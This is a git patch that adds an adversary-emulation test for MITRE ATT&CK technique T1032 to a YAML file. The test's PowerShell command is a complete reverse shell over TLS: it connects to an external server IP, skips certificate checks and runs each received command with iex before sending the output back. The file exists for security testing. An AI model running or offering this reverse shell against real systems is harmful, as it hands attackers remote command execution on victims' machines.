From 904b5a59a42df3dfca30e19d1ca0867964933dbc Mon Sep 17 00:00:00 2001
From: MrOrOneEquals1 <dfr1of8@gmail.com>
Date: Fri, 24 Jan 2020 08:24:57 -0700
Subject: [PATCH] T1032 - Add OpenSSL C2 (#795)

* T1032 Add OpenSSL C2 Test

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1032/T1032.yaml | 47 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 atomics/T1032/T1032.yaml

diff --git a/atomics/T1032/T1032.yaml b/atomics/T1032/T1032.yaml
new file mode 100644
index 00000000..2a64f37e
--- /dev/null
+++ b/atomics/T1032/T1032.yaml
@@ -0,0 +1,47 @@
+---
+attack_technique: T1032
+display_name: Standard Cryptographic Protocol
+
+atomic_tests:
+  - name: OpenSSL C2
+    description: |
+      Thanks to @OrOneEqualsOne for this quick C2 method.
+      This is to test to see if a C2 session can be established using an SSL socket.
+      More information about this technique, including how to set up the listener, can be found here:
+      https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
+    supported_platforms:
+      - windows
+    input_arguments:
+      server_ip:
+        description: 
+          IP of the external server
+        type: String
+        default: 127.0.0.1
+      server_port:
+        description:
+          The port to connect to on the external server
+        type: String
+        default: 443
+    executor:
+      name: powershell
+      elevation_required: false
+      command: |
+        $server_ip = #{server_ip}
+        $server_port = #{server_port}
+        $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+        $stream = $socket.GetStream()
+        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+        $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
+        $writer = new-object System.IO.StreamWriter($sslStream)
+        $writer.Write('PS ' + (pwd).Path + '> ')
+        $writer.flush()
+        [byte[]]$bytes = 0..65535|%{0};
+        while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
+        {$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+        $sendback = (iex $data | Out-String ) 2>&1;
+        $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+        $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
+      
+
+